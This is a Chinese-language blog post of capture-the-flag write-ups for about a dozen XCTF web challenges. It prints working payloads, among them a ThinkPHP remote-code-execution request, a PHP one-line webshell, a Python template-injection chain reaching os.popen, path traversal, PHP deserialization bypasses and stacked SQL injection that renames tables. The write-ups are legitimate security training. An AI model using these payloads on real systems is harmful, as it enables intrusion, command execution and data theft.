<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="呆航"><meta name="copyright" content="呆航"><meta name="generator" content="Hexo 5.2.0"><meta name="theme" content="hexo-theme-yun"><title>攻防世界web高手区部分wp | 呆航的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.25/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_dxory92pb0h.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"lqh827821562.gitee.io","root":"/","title":"呆航的小站","version":"1.7.0","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"algolia":{"appID":"E0XRZBP9EC","apiKey":"014277189b8673da64c5c3a931019c0e","indexName":"blog","hits":{"per_page":10}},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><link rel="alternate" href="/atom.xml" title="呆航的小站" type="application/atom+xml"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin><script async src="https://www.googletagmanager.com/gtag/js?id=UA-121354150-1"></script><script>if (CONFIG.hostname === location.hostname) {
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-121354150-1');
}</script><script data-ad-client="ca-pub-2245427233262012" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-M9KWR9L');</script><!-- End Google Tag Manager --><meta name="description" content="baby_web提示初始页面，先试下index.html，不存在，再试下index.php存在但是会直接跳转到1.php,使用bs拦截并且到重发器，文本提示flag在这里，点头，找到flag Training-WWW-Robots题目说的很明白了robots，想到爬虫协议，访问一下，看到一个fl0g.php的网页，跳转过去得到flag php_rce这种题感觉最难做了，是用的漏洞进入，不大好理解,">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界web高手区部分wp">
<meta property="og:url" content="http://lqh827821562.gitee.io/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E9%AB%98%E6%89%8B%E5%8C%BA%E9%83%A8%E5%88%86wp/index.html">
<meta property="og:site_name" content="呆航的小站">
<meta property="og:description" content="baby_web提示初始页面，先试下index.html，不存在，再试下index.php存在但是会直接跳转到1.php,使用bs拦截并且到重发器，文本提示flag在这里，点头，找到flag Training-WWW-Robots题目说的很明白了robots，想到爬虫协议，访问一下，看到一个fl0g.php的网页，跳转过去得到flag php_rce这种题感觉最难做了，是用的漏洞进入，不大好理解,">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/5wzfbT.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/5wzbx1.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/509JC4.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/509c2d.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/50pmm6.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/50C3Lt.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/50P3p4.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/50iNvj.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/50kU7q.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/19/50ksc4.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5DVZng.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5Dn0de.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5DQGTO.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5D1pMn.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5DtJW8.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5D3jjs.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5Dalw9.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/10/20/5DdSt1.png">
<meta property="article:published_time" content="2021-10-19T12:54:48.000Z">
<meta property="article:modified_time" content="2021-11-29T07:12:49.360Z">
<meta property="article:author" content="呆航">
<meta property="article:tag" content="web">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://z3.ax1x.com/2021/10/19/5wzfbT.png"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="呆航"><img width="96" loading="lazy" src="/images/avatar.png" alt="呆航"><span class="site-author-status" title="Looking for dawn.">🌑</span></a><div class="site-author-name"><a href="/about/">呆航</a></div><span class="site-name">呆航的小站</span><sub class="site-subtitle">All at sea.</sub><div class="site-desciption">希望能成为一个有趣的人</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">42</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">2</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">9</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="tencent://message/?uin=827821562&amp;site=qq&amp;menu=yes" title="QQ" target="_blank" style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#baby-web"><span class="toc-number">1.</span> <span class="toc-text">baby_web</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Training-WWW-Robots"><span class="toc-number">2.</span> <span class="toc-text">Training-WWW-Robots</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php-rce"><span class="toc-number">3.</span> <span class="toc-text">php_rce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-php-include"><span class="toc-number">4.</span> <span class="toc-text">Web_php_include</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ics-06"><span class="toc-number">5.</span> <span class="toc-text">ics-06</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#warmup"><span class="toc-number">6.</span> <span class="toc-text">warmup</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NewsCenter"><span class="toc-number">7.</span> <span class="toc-text">NewsCenter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NaNNaNNaNNaN-Batman"><span class="toc-number">8.</span> <span class="toc-text">NaNNaNNaNNaN-Batman</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP2"><span class="toc-number">9.</span> <span class="toc-text">PHP2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unserialize3"><span class="toc-number">10.</span> <span class="toc-text">unserialize3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#upload1"><span class="toc-number">11.</span> <span class="toc-text">upload1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-python-template-injection"><span class="toc-number">12.</span> <span class="toc-text">Web_python_template_injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-php-unserialize"><span class="toc-number">13.</span> <span class="toc-text">Web_php_unserialize</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#supersqli"><span class="toc-number">14.</span> <span class="toc-text">supersqli</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="http://lqh827821562.gitee.io/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E9%AB%98%E6%89%8B%E5%8C%BA%E9%83%A8%E5%88%86wp/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="呆航"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="呆航的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">攻防世界web高手区部分wp</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2021-10-19 20:54:48" itemprop="dateCreated datePublished" datetime="2021-10-19T20:54:48+08:00">2021-10-19</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-2-line"></use></svg></span> <time title="修改时间：2021-11-29 15:12:49" itemprop="dateModified" datetime="2021-11-29T15:12:49+08:00">2021-11-29</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-file-word-line"></use></svg></span> <span title="本文字数">2k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-timer-line"></use></svg></span> <span title="阅读时长">7m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><div class="post-classify"><span class="post-tag"><a class="tag-item" href="/tags/web/" style="--text-color:#21374b"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">web</span></a><a class="tag-item" href="/tags/wp/" style="--text-color:crimson"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">wp</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#0078E7;"><h2 id="baby-web"><a href="#baby-web" class="headerlink" title="baby_web"></a>baby_web</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/5wzfbT"><img src="https://z3.ax1x.com/2021/10/19/5wzfbT.png" alt="5wzfbT.png" loading="lazy"></a><br>提示初始页面，先试下index.html，不存在，再试下index.php存在但是会直接跳转到1.php,使用bs拦截并且到重发器，文本提示flag在这里，点头，找到flag</p>
<h2 id="Training-WWW-Robots"><a href="#Training-WWW-Robots" class="headerlink" title="Training-WWW-Robots"></a>Training-WWW-Robots</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/5wzbx1"><img src="https://z3.ax1x.com/2021/10/19/5wzbx1.png" alt="5wzbx1.png" loading="lazy"></a><br>题目说的很明白了robots，想到爬虫协议，访问一下，看到一个fl0g.php的网页，跳转过去得到flag</p>
<h2 id="php-rce"><a href="#php-rce" class="headerlink" title="php_rce"></a>php_rce</h2><p>这种题感觉最难做了，是用的漏洞进入，不大好理解,<a target="_blank" rel="noopener" href="https://www.cnblogs.com/backlion/p/10106676.html">参考资料</a><br>先构筑<code>/?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=ls</code><br>前面部分是套路，更改最后即可<br><a target="_blank" rel="noopener" href="https://imgtu.com/i/509JC4"><img src="https://z3.ax1x.com/2021/10/19/509JC4.png" alt="509JC4.png" loading="lazy"></a><br>显示出了当前位置的文件<br><a target="_blank" rel="noopener" href="https://imgtu.com/i/509c2d"><img src="https://z3.ax1x.com/2021/10/19/509c2d.png" alt="509c2d.png" loading="lazy"></a><br>到根目录发现了flag，把最后改成<code>cat /flag</code>得到答案  </p>
<h2 id="Web-php-include"><a href="#Web-php-include" class="headerlink" title="Web_php_include"></a>Web_php_include</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/50pmm6"><img src="https://z3.ax1x.com/2021/10/19/50pmm6.png" alt="50pmm6.png" loading="lazy"></a><br>先读php代码，这个代码表示以get方式读到page变量，page变量中奖php://替换为空，首先strstr是个区分大小写的，所以我们构造PHP://input来绕过这个过滤，构造这个以后就可以用post方式传入php，紧接着打开bs，传入<code>&lt;? system(&quot;ls&quot;)?&gt;</code>列出当前目录，看到有一个flag相关的php，然后使用<code>&lt;? system(&quot;cat fl4gisisish3r3.php&quot;)?&gt;</code>得到flag  </p>
<h2 id="ics-06"><a href="#ics-06" class="headerlink" title="ics-06"></a>ics-06</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/50C3Lt"><img src="https://z3.ax1x.com/2021/10/19/50C3Lt.png" alt="50C3Lt.png" loading="lazy"></a><br>报表中心可以进入，经过简单的测试，只有数字能保留，其他的无论什么形式都会变回数字，那么暴力一下试试<br><a target="_blank" rel="noopener" href="https://imgtu.com/i/50P3p4"><img src="https://z3.ax1x.com/2021/10/19/50P3p4.png" alt="50P3p4.png" loading="lazy"></a><br>2333长度不一致，试了一下果然是flag所在的位置</p>
<h2 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/50iNvj"><img src="https://z3.ax1x.com/2021/10/19/50iNvj.png" alt="50iNvj.png" loading="lazy"></a><br>首先看到源码里写了一个source.php，跳转过去后看到一对php代码，又是最不擅长的代码审计了，看到文件中有source还有一个hint，跳转过去看看，他说flag在ffffllllaaaagggg中，阅读php得到，4个条件满足一个即可<br>第一个 if 语句对变量进行检验，要求$page为字符串，否则返回 false<br>第二个 if 语句判断$page是否存在于$whitelist数组中，存在则返回 true<br>第三个 if 语句，截取传进参数中首次出现?之前的部分，判断该部分是否存在于$whitelist数组中，，存在则返回 true<br>第四个 if 语句，先对构造的 payload 进行 url 解码，再截取传进参数中首次出现?之前的部分，并判断该部分是否存在于$whitelist中，存在则返回 true  </p>
<p>利用第三个if构造<code>?file=source.php?/../../../../ffffllllaaaagggg</code><br>原理是<a target="_blank" rel="noopener" href="https://imgtu.com/i/50kU7q"><img src="https://z3.ax1x.com/2021/10/19/50kU7q.png" alt="50kU7q.png" loading="lazy"></a><br>现在还是不太理解这题的其他三个if能不能构造出答案，后期如果想到再改把。</p>
<h2 id="NewsCenter"><a href="#NewsCenter" class="headerlink" title="NewsCenter"></a>NewsCenter</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/50ksc4"><img src="https://z3.ax1x.com/2021/10/19/50ksc4.png" alt="50ksc4.png" loading="lazy"></a><br>第一次看到是这个，我还以为这个有啥能操作的呢，操作了半天，结果发现，真的是连接失败了，这个不是题目<br>————————分割线————————-<br>由于是做了之后再去写wp的，写wp时一直连接失败，没连接上，等待后续连接上再重新写wp了</p>
<h2 id="NaNNaNNaNNaN-Batman"><a href="#NaNNaNNaNNaN-Batman" class="headerlink" title="NaNNaNNaNNaN-Batman"></a>NaNNaNNaNNaN-Batman</h2><p>下载下来后是一串包含乱码的js代码，最后面能看到一个eval,把eval改成alert()这样能显示出全部代码<br><a target="_blank" rel="noopener" href="https://imgtu.com/i/5DVZng"><img src="https://z3.ax1x.com/2021/10/20/5DVZng.png" alt="5DVZng.png" loading="lazy"></a><br>读代码得出，e=be0f233ac7be98aa满足所有要求，把alert改回eval，以html打开得到flag</p>
<h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><p>打开后显示Can you anthenticate to this website?，使用御剑扫一下后台，扫出来index.php，也就是最初显示的页面，于是访问index.phps（tips:phps可以访问php页面的源码，但是貌似不是所有的php都有phps）<br><a target="_blank" rel="noopener" href="https://imgtu.com/i/5Dn0de"><img src="https://z3.ax1x.com/2021/10/20/5Dn0de.png" alt="5Dn0de.png" loading="lazy"></a><br>读代码得知，需要get传入id，与’admin’不相同，解码后与admin相同，这么说就很容理解了，把admin编码两次传入即可（url自己会解码一次），因为phps不接受传参，所以应当传入index.php里，得到flag</p>
<h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/5DQGTO"><img src="https://z3.ax1x.com/2021/10/20/5DQGTO.png" alt="5DQGTO.png" loading="lazy"></a><br>打开后是一个类，并且告诉了参数名字为code，题中看出，如果执行了__wakeup()会退出，那么就是要避免执行这个函数，上网查询得出当序列化字符串当中属性个数值大于实际的属性个数时,就会导致反序列化异常,从而跳过__wakeup函数，也就是两个问题，一个是序列化，一个是让序列化中属性个数大于实际个数，把前半部分复制下来，使用new xctf()来创建一个类，并且使用serialize()完成序列化，这里有一个<a target="_blank" rel="noopener" href="https://www.w3cschool.cn/tryrun/showphp/demo_func_string_serialize">在线php编辑</a>得到<code>O:4:&quot;xctf&quot;:1:&#123;s:4:&quot;flag&quot;;s:3:&quot;111&quot;;&#125;</code>，然后把xctf后面的1改大点，果然得到flag</p>
<h2 id="upload1"><a href="#upload1" class="headerlink" title="upload1"></a>upload1</h2><p>文件上传漏洞嘛，我熟，直接传一个一句话木马，<code>&lt;?php @eval($_POST[&#39;1&#39;]);?&gt;</code>,提示要上传一个图片，结果我发现一个有趣的地方<br><a target="_blank" rel="noopener" href="https://imgtu.com/i/5D1pMn"><img src="https://z3.ax1x.com/2021/10/20/5D1pMn.png" alt="5D1pMn.png" loading="lazy"></a><br>直接在前端禁用了提交，那么我手动删掉不就好了吗。把disabled删掉，然后用中国剑蚁连接找到flag</p>
<h2 id="Web-python-template-injection"><a href="#Web-python-template-injection" class="headerlink" title="Web_python_template_injection"></a>Web_python_template_injection</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/5DtJW8"><img src="https://z3.ax1x.com/2021/10/20/5DtJW8.png" alt="5DtJW8.png" loading="lazy"></a><br>首先在URL中输入14然后看到被识别为了14，存在SSTI,<br>接着在大括号中输入<code>[].__class__.__base__.__subclasses__()</code><br>会显示所有模块，根据回显内容，寻找<code>catch_warnings</code>的位置，是59个（根据网上题解看的，不理解为啥要找这个）<br>接着输入<code>&#123;&#123;[].__class__.__base__.__subclasses__()[59].__init__.func_globals.keys()&#125;&#125;</code>查找全局函数,然后找到了linecache函数，os模块就在其中，再输入<br><code>&#123;&#123;().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls").read()' )&#125;&#125;</code>发现当前目录两个文件，一个fl4g一个index.py，把ls换成cat fl4g，得到flag</p>
<h2 id="Web-php-unserialize"><a href="#Web-php-unserialize" class="headerlink" title="Web_php_unserialize"></a>Web_php_unserialize</h2><p>打开后又是php代码，看到了__wakeup，想到前面几关刚用过的序列化，于是<br><a target="_blank" rel="noopener" href="https://imgtu.com/i/5D3jjs"><img src="https://z3.ax1x.com/2021/10/20/5D3jjs.png" alt="5D3jjs.png" loading="lazy"></a><br>用途前面那关用过的方法解决，序列化破了，直接传参回显时stop hacking，还需要破下面的preg_match，读他的正则表达式看出，他搜索的是<code>o:数字：</code>破这个很简单了，众所周知+4和4是一样的，把4改为+4，再base64处理一下<br>emmm发现一个小失误，在序列化时我用的还是index.php，应该改为要找的那个文件，fl4g.php,重新做一下上述步骤，得出flag<br>emmm又发现一个失误，不要随便把序列化出来的东西复制出来，序列化出来的结果是<code>O:4:&quot;Demo&quot;:1:&#123;s:10:&quot;Demofile&quot;;s:8:&quot;fl4g.php&quot;;&#125;</code>仔细观察大括号里的第一项，有没有发现，长度只有8但是显示长度是10,中间有一些字符是不显示出来的,所以无论是绕过preg_match还是base64加密，都放在php里一起进行好了。<br>补充：序列化各部分含义，例如<code>O:4:&quot;Demo&quot;:1:&#123;s:10:&quot;Demofile&quot;;s:8:&quot;fl4g.php&quot;;&#125;</code>O表示序列化，4代表类名长度,Demo是类名，1代表该对象有一个属性，10为属性名长度，后面引号内容为属性名，8代表属性值长度，引号内容为属性值</p>
<h2 id="supersqli"><a href="#supersqli" class="headerlink" title="supersqli"></a>supersqli</h2><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/5Dalw9"><img src="https://z3.ax1x.com/2021/10/20/5Dalw9.png" alt="5Dalw9.png" loading="lazy"></a><br>看到过滤了select，试试堆叠注入，没问题依次输入<code>1&#39;;show tables #</code>和<code>1&#39;;show columns from &#39;1919810931114514&#39; #(这里&#39;是键盘左上角的那个，因为markdown中有其他用，先拿单引号代替一下)</code><br><a target="_blank" rel="noopener" href="https://imgtu.com/i/5DdSt1"><img src="https://z3.ax1x.com/2021/10/20/5DdSt1.png" alt="5DdSt1.png" loading="lazy"></a><br>发现flag在这个数字表中，之后因为select被过滤了，查询不出来啊，网上各类题解想用拼接和预处理解决，但是这方面我不太懂，我打算给两个表格交换一下名字。<br>emmm，吸取一个教训，交换表名和更改字段名要堆叠注入进去，不然就注入不了了，在互换表名后字段名不一致，所以，测试了一下没法注入了，因为第一节直接报错了，后面不知道为什么没有执行了……重开了容器一口气注入进去<br><code>0&#39;;rename table words to words1;rename table &#39;1919810931114514&#39; to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#</code>(把’替换为键盘左上角那个)<br>然后<code>0&#39; or 1=1 #</code>就可以了</p>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">如果你认为本篇博客帮助到了你，你可以请我喝个可乐</div><div id="qr" style="display:none;"><div style="display:inline-block"><a href="/images/zhifubao.png"><img loading="lazy" src="/images/zhifubao.png" alt="支付宝" title="支付宝"></a><div><span style="color:#00A3EE"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-alipay-line"></use></svg></span></div></div><div style="display:inline-block"><a href="/images/qq.png"><img loading="lazy" src="/images/qq.png" alt="QQ 支付" title="QQ 支付"></a><div><span style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></span></div></div><div style="display:inline-block"><a href="/images/wechat.png"><img loading="lazy" src="/images/wechat.png" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>呆航</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://lqh827821562.gitee.io/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E9%AB%98%E6%89%8B%E5%8C%BA%E9%83%A8%E5%88%86wp/" title="攻防世界web高手区部分wp">http://lqh827821562.gitee.io/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E9%AB%98%E6%89%8B%E5%8C%BA%E9%83%A8%E5%88%86wp/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2021-10-16%E8%A1%A5%E9%A2%98/" rel="prev" title="2021.10.16补题"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">2021.10.16补题</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/%E4%BF%AE%E5%A4%8Dvmware%E7%AA%81%E7%84%B6%E4%B8%8D%E8%81%94%E7%BD%91%E9%97%AE%E9%A2%98/" rel="next" title="修复vmware突然不联网问题"><span class="post-nav-text">修复vmware突然不联网问题</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div id="valine-container"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js", () => {
  const valineConfig = {"enable":true,"appId":"k8weiJIG9u6tXEjf9jL8pvQN-MdYXbMMI","appKey":"JtLQP97hURfluJNL00DMe8gl","placeholder":"Just go go","avatar":null,"pageSize":10,"visitor":false,"highlight":true,"recordIP":false,"enableQQ":true,"meta":["nick","mail","link"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = "/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E9%AB%98%E6%89%8B%E5%8C%BA%E9%83%A8%E5%88%86wp/"
  new Valine(valineConfig)
}, window.Valine);</script></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2022 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> 呆航</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.2.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.7.0</span></div><div class="live_time"><span>本博客已萌萌哒地运行</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2021-05-17T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
